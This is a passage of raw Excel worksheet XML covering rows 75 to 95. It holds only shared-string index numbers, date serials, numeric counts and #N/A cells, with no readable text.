      <c r="A75" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B75" s="51">
        <v>43721.705608020835</v>
      </c>
      <c r="C75" s="1" t="s">
        <v>2169</v>
      </c>
      <c r="D75" s="26">
        <v>105</v>
      </c>
      <c r="E75" s="72" t="s">
        <v>2170</v>
      </c>
      <c r="F75" s="26">
        <v>103</v>
      </c>
      <c r="G75" s="57" t="s">
        <v>2171</v>
      </c>
      <c r="H75" s="1" t="s">
        <v>1074</v>
      </c>
      <c r="I75" s="1" t="s">
        <v>38</v>
      </c>
      <c r="J75" s="1" t="s">
        <v>38</v>
      </c>
      <c r="K75" s="1" t="s">
        <v>38</v>
      </c>
      <c r="L75" s="1" t="s">
        <v>38</v>
      </c>
      <c r="M75" s="1" t="s">
        <v>38</v>
      </c>
      <c r="N75" s="1" t="s">
        <v>38</v>
      </c>
      <c r="O75" s="1" t="s">
        <v>1661</v>
      </c>
      <c r="P75" s="1" t="s">
        <v>1691</v>
      </c>
      <c r="Q75" s="1" t="s">
        <v>3652</v>
      </c>
      <c r="R75" s="82">
        <v>1308</v>
      </c>
      <c r="S75" s="82">
        <v>881</v>
      </c>
      <c r="T75" s="82">
        <v>14105</v>
      </c>
      <c r="U75" s="82">
        <v>31279</v>
      </c>
      <c r="V75" s="82">
        <v>55684</v>
      </c>
      <c r="W75" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="76" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A76" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B76" s="51">
        <v>43721.705608032411</v>
      </c>
      <c r="C76" s="1" t="s">
        <v>2169</v>
      </c>
      <c r="D76" s="26">
        <v>105</v>
      </c>
      <c r="E76" s="72" t="s">
        <v>2173</v>
      </c>
      <c r="F76" s="26">
        <v>104</v>
      </c>
      <c r="G76" s="57" t="s">
        <v>2174</v>
      </c>
      <c r="H76" s="1" t="s">
        <v>2175</v>
      </c>
      <c r="I76" s="1" t="s">
        <v>38</v>
      </c>
      <c r="J76" s="1" t="s">
        <v>38</v>
      </c>
      <c r="K76" s="1" t="s">
        <v>38</v>
      </c>
      <c r="L76" s="1" t="s">
        <v>38</v>
      </c>
      <c r="M76" s="1" t="s">
        <v>38</v>
      </c>
      <c r="N76" s="1" t="s">
        <v>38</v>
      </c>
      <c r="O76" s="1" t="s">
        <v>2176</v>
      </c>
      <c r="P76" s="1" t="s">
        <v>1709</v>
      </c>
      <c r="Q76" s="1" t="s">
        <v>3652</v>
      </c>
      <c r="R76" s="82">
        <v>396</v>
      </c>
      <c r="S76" s="82">
        <v>346</v>
      </c>
      <c r="T76" s="82">
        <v>7665</v>
      </c>
      <c r="U76" s="82">
        <v>25591</v>
      </c>
      <c r="V76" s="82">
        <v>42697</v>
      </c>
      <c r="W76" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="77" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A77" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B77" s="51">
        <v>43802.501913888889</v>
      </c>
      <c r="C77" s="1" t="s">
        <v>2177</v>
      </c>
      <c r="D77" s="26">
        <v>1313</v>
      </c>
      <c r="E77" s="1" t="s">
        <v>2178</v>
      </c>
      <c r="F77" s="26">
        <v>107</v>
      </c>
      <c r="G77" s="57" t="s">
        <v>2179</v>
      </c>
      <c r="H77" s="1" t="s">
        <v>2180</v>
      </c>
      <c r="I77" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J77" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K77" s="1" t="s">
        <v>22</v>
      </c>
      <c r="L77" s="16" t="s">
        <v>77</v>
      </c>
      <c r="M77" s="1" t="s">
        <v>1831</v>
      </c>
      <c r="N77" s="1"/>
      <c r="O77" s="1"/>
      <c r="P77" s="1"/>
      <c r="Q77" s="1" t="s">
        <v>3647</v>
      </c>
      <c r="R77" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S77" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T77" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U77" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V77" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W77" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="78" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A78" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B78" s="51">
        <v>44364.965841481484</v>
      </c>
      <c r="C78" s="1" t="s">
        <v>2181</v>
      </c>
      <c r="D78" s="26">
        <v>104</v>
      </c>
      <c r="E78" s="1" t="s">
        <v>2182</v>
      </c>
      <c r="F78" s="26">
        <v>104</v>
      </c>
      <c r="G78" s="57" t="s">
        <v>2183</v>
      </c>
      <c r="H78" s="1" t="s">
        <v>1074</v>
      </c>
      <c r="I78" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J78" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K78" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L78" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M78" s="1" t="s">
        <v>290</v>
      </c>
      <c r="N78" s="16" t="s">
        <v>291</v>
      </c>
      <c r="O78" s="1"/>
      <c r="P78" s="1"/>
      <c r="Q78" s="1" t="s">
        <v>3648</v>
      </c>
      <c r="R78" s="82">
        <v>43</v>
      </c>
      <c r="S78" s="82">
        <v>85</v>
      </c>
      <c r="T78" s="82">
        <v>905</v>
      </c>
      <c r="U78" s="82">
        <v>739</v>
      </c>
      <c r="V78" s="82">
        <v>1022</v>
      </c>
      <c r="W78" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="79" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A79" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B79" s="51">
        <v>43707.754125347223</v>
      </c>
      <c r="C79" s="1" t="s">
        <v>2075</v>
      </c>
      <c r="D79" s="26">
        <v>106</v>
      </c>
      <c r="E79" s="1" t="s">
        <v>2184</v>
      </c>
      <c r="F79" s="26">
        <v>100</v>
      </c>
      <c r="G79" s="57" t="s">
        <v>2185</v>
      </c>
      <c r="H79" s="1" t="s">
        <v>2186</v>
      </c>
      <c r="I79" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J79" s="1" t="s">
        <v>301</v>
      </c>
      <c r="K79" s="1" t="s">
        <v>26</v>
      </c>
      <c r="L79" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M79" s="1" t="s">
        <v>475</v>
      </c>
      <c r="N79" s="1" t="s">
        <v>476</v>
      </c>
      <c r="O79" s="1"/>
      <c r="P79" s="1"/>
      <c r="Q79" s="1" t="s">
        <v>3646</v>
      </c>
      <c r="R79" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S79" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T79" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U79" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V79" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W79" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="80" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A80" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B80" s="51">
        <v>43791.132544571759</v>
      </c>
      <c r="C80" s="1" t="s">
        <v>2187</v>
      </c>
      <c r="D80" s="26">
        <v>110</v>
      </c>
      <c r="E80" s="1" t="s">
        <v>2188</v>
      </c>
      <c r="F80" s="26">
        <v>110</v>
      </c>
      <c r="G80" s="57" t="s">
        <v>2189</v>
      </c>
      <c r="H80" s="1" t="s">
        <v>2190</v>
      </c>
      <c r="I80" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J80" s="1" t="s">
        <v>301</v>
      </c>
      <c r="K80" s="1" t="s">
        <v>26</v>
      </c>
      <c r="L80" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M80" s="1" t="s">
        <v>475</v>
      </c>
      <c r="N80" s="1" t="s">
        <v>476</v>
      </c>
      <c r="O80" s="1"/>
      <c r="P80" s="1"/>
      <c r="Q80" s="1" t="s">
        <v>3648</v>
      </c>
      <c r="R80" s="82">
        <v>307</v>
      </c>
      <c r="S80" s="82">
        <v>283</v>
      </c>
      <c r="T80" s="82">
        <v>9505</v>
      </c>
      <c r="U80" s="82">
        <v>17756</v>
      </c>
      <c r="V80" s="82">
        <v>25535</v>
      </c>
      <c r="W80" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="81" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A81" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B81" s="51">
        <v>43581.484275254632</v>
      </c>
      <c r="C81" s="1" t="s">
        <v>2191</v>
      </c>
      <c r="D81" s="26">
        <v>114</v>
      </c>
      <c r="E81" s="1" t="s">
        <v>2192</v>
      </c>
      <c r="F81" s="26">
        <v>105</v>
      </c>
      <c r="G81" s="57" t="s">
        <v>2193</v>
      </c>
      <c r="H81" s="1" t="s">
        <v>2194</v>
      </c>
      <c r="I81" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J81" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K81" s="1" t="s">
        <v>22</v>
      </c>
      <c r="L81" s="16" t="s">
        <v>77</v>
      </c>
      <c r="M81" s="1" t="s">
        <v>1831</v>
      </c>
      <c r="N81" s="1"/>
      <c r="O81" s="1"/>
      <c r="P81" s="1"/>
      <c r="Q81" s="1" t="s">
        <v>2195</v>
      </c>
      <c r="R81" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S81" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T81" s="82">
        <v>2622</v>
      </c>
      <c r="U81" s="82">
        <v>4319</v>
      </c>
      <c r="V81" s="82">
        <v>10033</v>
      </c>
      <c r="W81" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="82" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A82" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B82" s="51">
        <v>44127.150470520835</v>
      </c>
      <c r="C82" s="1" t="s">
        <v>2191</v>
      </c>
      <c r="D82" s="26">
        <v>202</v>
      </c>
      <c r="E82" s="1" t="s">
        <v>2192</v>
      </c>
      <c r="F82" s="26">
        <v>107</v>
      </c>
      <c r="G82" s="57" t="s">
        <v>2193</v>
      </c>
      <c r="H82" s="1" t="s">
        <v>2194</v>
      </c>
      <c r="I82" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J82" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K82" s="1" t="s">
        <v>22</v>
      </c>
      <c r="L82" s="16" t="s">
        <v>77</v>
      </c>
      <c r="M82" s="1" t="s">
        <v>1831</v>
      </c>
      <c r="N82" s="1"/>
      <c r="O82" s="1"/>
      <c r="P82" s="1"/>
      <c r="Q82" s="1" t="s">
        <v>3647</v>
      </c>
      <c r="R82" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S82" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T82" s="82">
        <v>6075828</v>
      </c>
      <c r="U82" s="82">
        <v>8275364</v>
      </c>
      <c r="V82" s="82">
        <v>9872008</v>
      </c>
      <c r="W82" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="83" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A83" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B83" s="51">
        <v>43663.648928819443</v>
      </c>
      <c r="C83" s="1" t="s">
        <v>2191</v>
      </c>
      <c r="D83" s="26">
        <v>114</v>
      </c>
      <c r="E83" s="1" t="s">
        <v>2196</v>
      </c>
      <c r="F83" s="26">
        <v>101</v>
      </c>
      <c r="G83" s="57" t="s">
        <v>2197</v>
      </c>
      <c r="H83" s="1" t="s">
        <v>2198</v>
      </c>
      <c r="I83" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J83" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K83" s="1" t="s">
        <v>22</v>
      </c>
      <c r="L83" s="16" t="s">
        <v>77</v>
      </c>
      <c r="M83" s="1" t="s">
        <v>1831</v>
      </c>
      <c r="N83" s="1"/>
      <c r="O83" s="1"/>
      <c r="P83" s="1"/>
      <c r="Q83" s="1" t="s">
        <v>2195</v>
      </c>
      <c r="R83" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S83" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T83" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U83" s="82">
        <v>3</v>
      </c>
      <c r="V83" s="82">
        <v>6343</v>
      </c>
      <c r="W83" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="84" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A84" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B84" s="51">
        <v>44127.150470578701</v>
      </c>
      <c r="C84" s="1" t="s">
        <v>2191</v>
      </c>
      <c r="D84" s="26">
        <v>202</v>
      </c>
      <c r="E84" s="1" t="s">
        <v>2196</v>
      </c>
      <c r="F84" s="26">
        <v>102</v>
      </c>
      <c r="G84" s="57" t="s">
        <v>2197</v>
      </c>
      <c r="H84" s="1" t="s">
        <v>2198</v>
      </c>
      <c r="I84" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J84" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K84" s="1" t="s">
        <v>22</v>
      </c>
      <c r="L84" s="16" t="s">
        <v>77</v>
      </c>
      <c r="M84" s="1" t="s">
        <v>1831</v>
      </c>
      <c r="N84" s="1"/>
      <c r="O84" s="1"/>
      <c r="P84" s="1"/>
      <c r="Q84" s="1" t="s">
        <v>2195</v>
      </c>
      <c r="R84" s="82">
        <v>18102</v>
      </c>
      <c r="S84" s="82">
        <v>22313</v>
      </c>
      <c r="T84" s="82">
        <v>503801</v>
      </c>
      <c r="U84" s="82">
        <v>574539</v>
      </c>
      <c r="V84" s="82">
        <v>648194</v>
      </c>
      <c r="W84" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="85" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A85" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B85" s="51">
        <v>43663.648928796298</v>
      </c>
      <c r="C85" s="1" t="s">
        <v>2191</v>
      </c>
      <c r="D85" s="26">
        <v>114</v>
      </c>
      <c r="E85" s="1" t="s">
        <v>2199</v>
      </c>
      <c r="F85" s="26">
        <v>101</v>
      </c>
      <c r="G85" s="57" t="s">
        <v>2200</v>
      </c>
      <c r="H85" s="1" t="s">
        <v>2201</v>
      </c>
      <c r="I85" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J85" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K85" s="1" t="s">
        <v>22</v>
      </c>
      <c r="L85" s="16" t="s">
        <v>77</v>
      </c>
      <c r="M85" s="1" t="s">
        <v>1831</v>
      </c>
      <c r="N85" s="1"/>
      <c r="O85" s="1"/>
      <c r="P85" s="1"/>
      <c r="Q85" s="1" t="s">
        <v>3647</v>
      </c>
      <c r="R85" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S85" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T85" s="82">
        <v>2619</v>
      </c>
      <c r="U85" s="82">
        <v>4316</v>
      </c>
      <c r="V85" s="82">
        <v>10029</v>
      </c>
      <c r="W85" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="86" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A86" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B86" s="51">
        <v>44127.150470555556</v>
      </c>
      <c r="C86" s="1" t="s">
        <v>2191</v>
      </c>
      <c r="D86" s="26">
        <v>202</v>
      </c>
      <c r="E86" s="1" t="s">
        <v>2199</v>
      </c>
      <c r="F86" s="26">
        <v>102</v>
      </c>
      <c r="G86" s="57" t="s">
        <v>2200</v>
      </c>
      <c r="H86" s="1" t="s">
        <v>2201</v>
      </c>
      <c r="I86" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J86" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K86" s="1" t="s">
        <v>22</v>
      </c>
      <c r="L86" s="16" t="s">
        <v>77</v>
      </c>
      <c r="M86" s="1" t="s">
        <v>1831</v>
      </c>
      <c r="N86" s="1"/>
      <c r="O86" s="1"/>
      <c r="P86" s="1"/>
      <c r="Q86" s="1" t="s">
        <v>3647</v>
      </c>
      <c r="R86" s="82">
        <v>152184</v>
      </c>
      <c r="S86" s="82">
        <v>155153</v>
      </c>
      <c r="T86" s="82">
        <v>3722015</v>
      </c>
      <c r="U86" s="82">
        <v>5605308</v>
      </c>
      <c r="V86" s="82">
        <v>6190936</v>
      </c>
      <c r="W86" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="87" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A87" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B87" s="51">
        <v>43672.605824351849</v>
      </c>
      <c r="C87" s="1" t="s">
        <v>2191</v>
      </c>
      <c r="D87" s="26">
        <v>114</v>
      </c>
      <c r="E87" s="1" t="s">
        <v>2202</v>
      </c>
      <c r="F87" s="26">
        <v>103</v>
      </c>
      <c r="G87" s="57" t="s">
        <v>2203</v>
      </c>
      <c r="H87" s="1" t="s">
        <v>2204</v>
      </c>
      <c r="I87" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J87" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K87" s="1" t="s">
        <v>22</v>
      </c>
      <c r="L87" s="16" t="s">
        <v>77</v>
      </c>
      <c r="M87" s="1" t="s">
        <v>1831</v>
      </c>
      <c r="N87" s="1"/>
      <c r="O87" s="1"/>
      <c r="P87" s="1"/>
      <c r="Q87" s="1" t="s">
        <v>2195</v>
      </c>
      <c r="R87" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S87" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T87" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U87" s="82">
        <v>3</v>
      </c>
      <c r="V87" s="82">
        <v>6345</v>
      </c>
      <c r="W87" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="88" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A88" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B88" s="51">
        <v>44127.150470590277</v>
      </c>
      <c r="C88" s="1" t="s">
        <v>2191</v>
      </c>
      <c r="D88" s="26">
        <v>202</v>
      </c>
      <c r="E88" s="1" t="s">
        <v>2202</v>
      </c>
      <c r="F88" s="26">
        <v>104</v>
      </c>
      <c r="G88" s="57" t="s">
        <v>2203</v>
      </c>
      <c r="H88" s="1" t="s">
        <v>2204</v>
      </c>
      <c r="I88" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J88" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K88" s="1" t="s">
        <v>22</v>
      </c>
      <c r="L88" s="16" t="s">
        <v>77</v>
      </c>
      <c r="M88" s="1" t="s">
        <v>1831</v>
      </c>
      <c r="N88" s="1"/>
      <c r="O88" s="1"/>
      <c r="P88" s="1"/>
      <c r="Q88" s="1" t="s">
        <v>2195</v>
      </c>
      <c r="R88" s="82">
        <v>9049</v>
      </c>
      <c r="S88" s="82">
        <v>8592</v>
      </c>
      <c r="T88" s="82">
        <v>152037</v>
      </c>
      <c r="U88" s="82">
        <v>287411</v>
      </c>
      <c r="V88" s="82">
        <v>307751</v>
      </c>
      <c r="W88" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="89" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A89" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B89" s="51">
        <v>43571.43165849537</v>
      </c>
      <c r="C89" s="1" t="s">
        <v>2191</v>
      </c>
      <c r="D89" s="26">
        <v>114</v>
      </c>
      <c r="E89" s="1" t="s">
        <v>2205</v>
      </c>
      <c r="F89" s="26">
        <v>106</v>
      </c>
      <c r="G89" s="57" t="s">
        <v>2206</v>
      </c>
      <c r="H89" s="1" t="s">
        <v>2207</v>
      </c>
      <c r="I89" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J89" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K89" s="1" t="s">
        <v>22</v>
      </c>
      <c r="L89" s="16" t="s">
        <v>77</v>
      </c>
      <c r="M89" s="1" t="s">
        <v>1831</v>
      </c>
      <c r="N89" s="1"/>
      <c r="O89" s="1"/>
      <c r="P89" s="1"/>
      <c r="Q89" s="1" t="s">
        <v>3647</v>
      </c>
      <c r="R89" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S89" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T89" s="82">
        <v>2621</v>
      </c>
      <c r="U89" s="82">
        <v>4313</v>
      </c>
      <c r="V89" s="82">
        <v>4463</v>
      </c>
      <c r="W89" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="90" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A90" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B90" s="51">
        <v>44127.150470601853</v>
      </c>
      <c r="C90" s="1" t="s">
        <v>2191</v>
      </c>
      <c r="D90" s="26">
        <v>202</v>
      </c>
      <c r="E90" s="1" t="s">
        <v>2205</v>
      </c>
      <c r="F90" s="26">
        <v>201</v>
      </c>
      <c r="G90" s="57" t="s">
        <v>2206</v>
      </c>
      <c r="H90" s="1" t="s">
        <v>2207</v>
      </c>
      <c r="I90" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J90" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K90" s="1" t="s">
        <v>22</v>
      </c>
      <c r="L90" s="16" t="s">
        <v>77</v>
      </c>
      <c r="M90" s="1" t="s">
        <v>1831</v>
      </c>
      <c r="N90" s="1"/>
      <c r="O90" s="1"/>
      <c r="P90" s="1"/>
      <c r="Q90" s="1" t="s">
        <v>3647</v>
      </c>
      <c r="R90" s="82">
        <v>191930</v>
      </c>
      <c r="S90" s="82">
        <v>204974</v>
      </c>
      <c r="T90" s="82">
        <v>4214475</v>
      </c>
      <c r="U90" s="82">
        <v>6780818</v>
      </c>
      <c r="V90" s="82">
        <v>7608985</v>
      </c>
      <c r="W90" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="91" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A91" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B91" s="51">
        <v>43644.657267199073</v>
      </c>
      <c r="C91" s="1" t="s">
        <v>2191</v>
      </c>
      <c r="D91" s="26">
        <v>114</v>
      </c>
      <c r="E91" s="1" t="s">
        <v>2208</v>
      </c>
      <c r="F91" s="26">
        <v>106</v>
      </c>
      <c r="G91" s="57" t="s">
        <v>2209</v>
      </c>
      <c r="H91" s="1" t="s">
        <v>2210</v>
      </c>
      <c r="I91" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J91" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K91" s="1" t="s">
        <v>22</v>
      </c>
      <c r="L91" s="16" t="s">
        <v>77</v>
      </c>
      <c r="M91" s="1" t="s">
        <v>1831</v>
      </c>
      <c r="N91" s="1"/>
      <c r="O91" s="1"/>
      <c r="P91" s="1"/>
      <c r="Q91" s="1" t="s">
        <v>3647</v>
      </c>
      <c r="R91" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S91" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T91" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U91" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V91" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W91" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="92" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A92" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B92" s="51">
        <v>44127.15047054398</v>
      </c>
      <c r="C92" s="1" t="s">
        <v>2191</v>
      </c>
      <c r="D92" s="26">
        <v>202</v>
      </c>
      <c r="E92" s="1" t="s">
        <v>2208</v>
      </c>
      <c r="F92" s="26">
        <v>107</v>
      </c>
      <c r="G92" s="57" t="s">
        <v>2209</v>
      </c>
      <c r="H92" s="1" t="s">
        <v>2210</v>
      </c>
      <c r="I92" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J92" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K92" s="1" t="s">
        <v>22</v>
      </c>
      <c r="L92" s="16" t="s">
        <v>77</v>
      </c>
      <c r="M92" s="1" t="s">
        <v>1831</v>
      </c>
      <c r="N92" s="1"/>
      <c r="O92" s="1"/>
      <c r="P92" s="1"/>
      <c r="Q92" s="1" t="s">
        <v>2195</v>
      </c>
      <c r="R92" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S92" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T92" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U92" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V92" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W92" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="93" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A93" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B93" s="51">
        <v>44292.082165092594</v>
      </c>
      <c r="C93" s="1" t="s">
        <v>2211</v>
      </c>
      <c r="D93" s="26">
        <v>120</v>
      </c>
      <c r="E93" s="1" t="s">
        <v>2212</v>
      </c>
      <c r="F93" s="26">
        <v>120</v>
      </c>
      <c r="G93" s="57" t="s">
        <v>2213</v>
      </c>
      <c r="H93" s="1" t="s">
        <v>2214</v>
      </c>
      <c r="I93" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J93" s="1" t="s">
        <v>301</v>
      </c>
      <c r="K93" s="1" t="s">
        <v>26</v>
      </c>
      <c r="L93" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M93" s="1" t="s">
        <v>475</v>
      </c>
      <c r="N93" s="1" t="s">
        <v>476</v>
      </c>
      <c r="O93" s="1"/>
      <c r="P93" s="1"/>
      <c r="Q93" s="1" t="s">
        <v>3648</v>
      </c>
      <c r="R93" s="82">
        <v>13673</v>
      </c>
      <c r="S93" s="82">
        <v>13128</v>
      </c>
      <c r="T93" s="82">
        <v>212405</v>
      </c>
      <c r="U93" s="82">
        <v>367010</v>
      </c>
      <c r="V93" s="82">
        <v>412860</v>
      </c>
      <c r="W93" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="94" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A94" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B94" s="51">
        <v>44292.08282974537</v>
      </c>
      <c r="C94" s="1" t="s">
        <v>2215</v>
      </c>
      <c r="D94" s="26">
        <v>120</v>
      </c>
      <c r="E94" s="1" t="s">
        <v>2216</v>
      </c>
      <c r="F94" s="26">
        <v>120</v>
      </c>
      <c r="G94" s="57" t="s">
        <v>2217</v>
      </c>
      <c r="H94" s="1" t="s">
        <v>2218</v>
      </c>
      <c r="I94" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J94" s="1" t="s">
        <v>301</v>
      </c>
      <c r="K94" s="1" t="s">
        <v>26</v>
      </c>
      <c r="L94" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M94" s="1" t="s">
        <v>475</v>
      </c>
      <c r="N94" s="1" t="s">
        <v>476</v>
      </c>
      <c r="O94" s="1"/>
      <c r="P94" s="1"/>
      <c r="Q94" s="1" t="s">
        <v>3648</v>
      </c>
      <c r="R94" s="82">
        <v>11186</v>
      </c>
      <c r="S94" s="82">
        <v>10763</v>
      </c>
      <c r="T94" s="82">
        <v>171282</v>
      </c>
      <c r="U94" s="82">
        <v>290779</v>
      </c>
      <c r="V94" s="82">
        <v>329890</v>
      </c>
      <c r="W94" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="95" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A95" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B95" s="51">
        <v>43663.662263425926</v>
      </c>
      <c r="C95" s="1" t="s">
        <v>2177</v>
      </c>
      <c r="D95" s="26">
        <v>1313</v>
      </c>
      <c r="E95" s="1" t="s">
        <v>2219</v>
      </c>
      <c r="F95" s="26">
        <v>106</v>
      </c>
      <c r="G95" s="57" t="s">
        <v>2220</v>
      </c>
      <c r="H95" s="1" t="s">
        <v>2221</v>
      </c>
      <c r="I95" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J95" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K95" s="1" t="s">
        <v>22</v>
      </c>
      <c r="L95" s="16" t="s">
        <v>77</v>
      </c>
      <c r="M95" s="1" t="s">
        <v>1831</v>
      </c>
      <c r="N95" s="1"/>
      <c r="O95" s="1"/>
      <c r="P95" s="1"/>
      <c r="Q95" s="1" t="s">
        <v>3647</v>
      </c>
      <c r="R95" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S95" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T95" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U95" s="82">
